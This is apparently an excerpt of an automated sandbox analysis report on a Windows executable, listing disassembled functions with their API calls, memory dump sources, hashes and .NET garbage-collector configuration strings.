                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                                                • String ID: PROCESSOR_COUNT
                                                • API String ID: 1701933505-4048346908
                                                • Opcode ID: df59b9fccf507002a6fc365712127db3b91d70bddeca77e829d668f229e319f7
                                                • Instruction ID: dcaf70c88390b551d8c6018fd00588729972d21cb884793113bd6aa41eee3f4c
                                                • Opcode Fuzzy Hash: df59b9fccf507002a6fc365712127db3b91d70bddeca77e829d668f229e319f7
                                                • Instruction Fuzzy Hash: 3C31A231A19B8282EBA49B70D4903BD67A1EF44748F5C0031D68EE7E99DF3CE809D748
                                                Function 00007FF658553200 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF6585532F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFailFastRaise$Sleep
                                                • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                • API String ID: 3706814929-926682358
                                                • Opcode ID: c6802e911c5ebcfe0a1351dc388af011cb9ccf6ec17774bc3a49ecfdbf353aa5
                                                • Instruction ID: 2042e7406151752141e8f5634a2075967b1d6500bc2da0c2d44004589062021d
                                                • Opcode Fuzzy Hash: c6802e911c5ebcfe0a1351dc388af011cb9ccf6ec17774bc3a49ecfdbf353aa5
                                                • Instruction Fuzzy Hash: EC413931A09B4286EBE19B35F4503B923A1EF55784F0C4039CA0DE7BA1CF3EE655C688
                                                Function 00007FF65855CF20 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                • String ID:
                                                • API String ID: 2150560229-0
                                                • Opcode ID: 4a56b605204c313bed2949cdee0fbdf40efa17fe1b8a4b6ea1de50fcfb5e3b56
                                                • Instruction ID: bf242928971a0d85dc64ea61ada31f696a8bb40937b2ca86e71c0c78a7d5fb59
                                                • Opcode Fuzzy Hash: 4a56b605204c313bed2949cdee0fbdf40efa17fe1b8a4b6ea1de50fcfb5e3b56
                                                • Instruction Fuzzy Hash: 53E092A9E15712C2FB149B31B8183395360BF98B85F5C4134DE5F56BA0EF3C9145DA08
                                                Function 00007FF658562140 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 175 7ff658562140-7ff658562171 176 7ff658562177-7ff658562192 GetCurrentProcess call 7ff6585b08c3 175->176 177 7ff65856222f-7ff65856224c GlobalMemoryStatusEx 175->177 176->177 188 7ff658562198-7ff6585621a0 176->188 179 7ff6585622d2-7ff6585622d5 177->179 180 7ff658562252-7ff658562255 177->180 181 7ff6585622d7-7ff6585622db 179->181 182 7ff6585622de-7ff6585622e1 179->182 184 7ff658562257-7ff658562262 180->184 185 7ff6585622c1-7ff6585622c4 180->185 181->182 186 7ff6585622eb-7ff6585622ee 182->186 187 7ff6585622e3-7ff6585622e8 182->187 189 7ff65856226b-7ff65856227c 184->189 190 7ff658562264-7ff658562269 184->190 191 7ff6585622c6 185->191 192 7ff6585622c9-7ff6585622cc 185->192 193 7ff6585622f8-7ff65856231b call 7ff6585b0c20 186->193 195 7ff6585622f0 186->195 187->186 196 7ff65856220a-7ff65856220f 188->196 197 7ff6585621a2-7ff6585621a8 188->197 198 7ff658562280-7ff658562291 189->198 190->198 191->192 192->193 194 7ff6585622ce-7ff6585622d0 192->194 201 7ff6585622f5 194->201 195->201 199 7ff658562221-7ff658562224 196->199 200 7ff658562211-7ff658562214 196->200 202 7ff6585621aa-7ff6585621af 197->202 203 7ff6585621b1-7ff6585621c5 197->203 205 7ff65856229a-7ff6585622ae 198->205 206 7ff658562293-7ff658562298 198->206 199->193 209 7ff65856222a 199->209 207 7ff65856221b-7ff65856221e 200->207 208 7ff658562216-7ff658562219 200->208 201->193 210 7ff6585621c9-7ff6585621da 202->210 203->210 212 7ff6585622b2-7ff6585622be 205->212 206->212 207->199 208->199 209->201 213 7ff6585621dc-7ff6585621e1 210->213 214 7ff6585621e3-7ff6585621f7 210->214 212->185 215 7ff6585621fb-7ff658562207 213->215 214->215 215->196
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CurrentGlobalMemoryProcessStatus
                                                • String ID: @
                                                • API String ID: 3261791682-2766056989
                                                • Opcode ID: 28461a306fc3374e589f1644d5753cbf3d64b28f9de3a6a1dcdcbb79d88f20ec
                                                • Instruction ID: b4b5d1d1cd60c52157aeec61c7db22df3c16c8ba35cc82b7ddff962bbcb53bb2
                                                • Opcode Fuzzy Hash: 28461a306fc3374e589f1644d5753cbf3d64b28f9de3a6a1dcdcbb79d88f20ec
                                                • Instruction Fuzzy Hash: E141D461B09B4641EE96CA37911033996926F5ABC0F5CC731DD1EB6F48FF3DE4818604
                                                Function 00007FF65856899B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Count64Tick
                                                • String ID: D)
                                                • API String ID: 1927824332-848725745
                                                • Opcode ID: b9fe4c2506f08c6a26c8c4dd7f3f4db5274bf5845df2519089e1e6bba78dcdb3
                                                • Instruction ID: 5789409cc559653d3b4c5e99e70a16168e16dce1b5b40fda5a1f7c7684250666
                                                • Opcode Fuzzy Hash: b9fe4c2506f08c6a26c8c4dd7f3f4db5274bf5845df2519089e1e6bba78dcdb3
                                                • Instruction Fuzzy Hash: B3416A31E1CA4285FAA59B36A84627963A1AF00B94F0C8536CD4EF3FA5DF3DE441C319
                                                Function 00007FF6585629E0 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF658566538,?,?,0000000B,00007FF658565400,?,?,00000000,00007FF65855F7C1), ref: 00007FF658562A07
                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF658566538,?,?,0000000B,00007FF658565400,?,?,00000000,00007FF65855F7C1), ref: 00007FF658562A27
                                                • VirtualAllocExNuma.KERNEL32 ref: 00007FF658562A48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: AllocVirtual$CurrentNumaProcess
                                                • String ID:
                                                • API String ID: 647533253-0
                                                • Opcode ID: 625f1e7399fc93da6f37fa1e0330fb08ecf441602bb64bf0d621cc29f3cf2d2c
                                                • Instruction ID: cdf30caed5a30129d8192174aef91cbd90450ed1d870e85d7da806df69f72a98
                                                • Opcode Fuzzy Hash: 625f1e7399fc93da6f37fa1e0330fb08ecf441602bb64bf0d621cc29f3cf2d2c
                                                • Instruction Fuzzy Hash: A5F0AF71B086A1C6EB208B16F404219A760EB49FD8F584139EF9C6BF58DF3DC5818B04
                                                Function 00007FF6585629A0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: df8486f038e79b547ccdb021daa754100f3a5205bbaa03da553d2b0464387378
                                                • Instruction ID: e5c7a67a1d901cfbaf4c3b35220c441f2d4880e33fb18e83a9e29ed793b92c5a
                                                • Opcode Fuzzy Hash: df8486f038e79b547ccdb021daa754100f3a5205bbaa03da553d2b0464387378
                                                • Instruction Fuzzy Hash: 5FE0CD34F16501C9FF589733684552816516F89B00FD8C038C40E96F50DE2E5156DB04
                                                Function 00007FF6585E1B50 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF6585E1A10,?,?,00000030), ref: 00007FF6585E1BC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: bcab976dc68f312849d0fcdc6b43bb40a9dcb7c7cf9a6a9b11be4ce990bc2283
                                                • Instruction ID: aafef96109159ae905925f9e2750a07a39b8d03d7138741ef8f370361cd08f7b
                                                • Opcode Fuzzy Hash: bcab976dc68f312849d0fcdc6b43bb40a9dcb7c7cf9a6a9b11be4ce990bc2283
                                                • Instruction Fuzzy Hash: F031B022E4861795FB91AB71EC413BD22A46F44784F5C4172DD0EFBF96DE2CE8858348
                                                Function 00007FF6585526B0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                                                • String ID:
                                                • API String ID: 2131581837-0
                                                • Opcode ID: 5a77206ce6067a246c4da80bd04c8f1e90611e81ec538006d8f25cd51997ff1c
                                                • Instruction ID: 77b055686412fa4d140d6c4223ab68120a916c6c72c20e5d2c553a93942137c0
                                                • Opcode Fuzzy Hash: 5a77206ce6067a246c4da80bd04c8f1e90611e81ec538006d8f25cd51997ff1c
                                                • Instruction Fuzzy Hash: 82114C7290878182DAA4DF25E4011AEB350FB457B0F584339E6BE57BD6DF38D5468704
                                                Function 00007FF658562A70 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 466d4d9c988fe849325ae7168e876d2e859bac2774cb7984135f3943153e00f4
                                                • Instruction ID: 3d0a1fef33baaa53dce145fd9b765949489816b9f01f31d529173349e7cd5c8a
                                                • Opcode Fuzzy Hash: 466d4d9c988fe849325ae7168e876d2e859bac2774cb7984135f3943153e00f4
                                                • Instruction Fuzzy Hash: 15B01214F16111C6E70427337C8270C02242B05F02FD80028C608F4A90CD1E81E52B04

                                                Non-executed Functions

                                                Function 00007FF658562D00 Relevance: 123.1, Strings: 98, Instructions: 569COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCPath$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.Path$System.GC.RetainVM$System.GC.Server
                                                • API String ID: 0-1379766591
                                                • Opcode ID: aea8e211407e160569e901d7ffe0990671890cbd52ae028845b6437f3ac61894
                                                • Instruction ID: 180ac5aeadd6de51e15d46ff03369a8eb54f4848e15a3a5b1d99d67af8aa15ed
                                                • Opcode Fuzzy Hash: aea8e211407e160569e901d7ffe0990671890cbd52ae028845b6437f3ac61894
                                                • Instruction Fuzzy Hash: 9F426F61608B5782EB209B35FC50AA967A5FF657C8F891132D98D57F28DF3CD206CB08
                                                Function 00007FF658563AC0 Relevance: 113.0, Strings: 90, Instructions: 479COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: strcmp
                                                • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                • API String ID: 1004003707-1492036319
                                                • Opcode ID: 36b66872262398e0886a26fc236604f32fdc404a408f84d1ed38b3fdaa7ebc27
                                                • Instruction ID: 621538f02bb99687fd76239c9cde2af8b784a41907d28c2342852dba381ac2d1
                                                • Opcode Fuzzy Hash: 36b66872262398e0886a26fc236604f32fdc404a408f84d1ed38b3fdaa7ebc27
                                                • Instruction Fuzzy Hash: DF62C464D8DB8794FA40DB75AC501BA2BA1AF65740F8C0032C48FE7F66DF2CA159C768
                                                Function 00007FF658562B30 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                • String ID: SeLockMemoryPrivilege
                                                • API String ID: 1752251271-475654710
                                                • Opcode ID: c8564b734ccbaacaf3b0576976fb44c3c840db276b6d24103a14a80d5a63f89b
                                                • Instruction ID: e0c1f3ecf466ea6343c15c0700f8af3754b45bf89e2928d6ce2d5b76597139f3
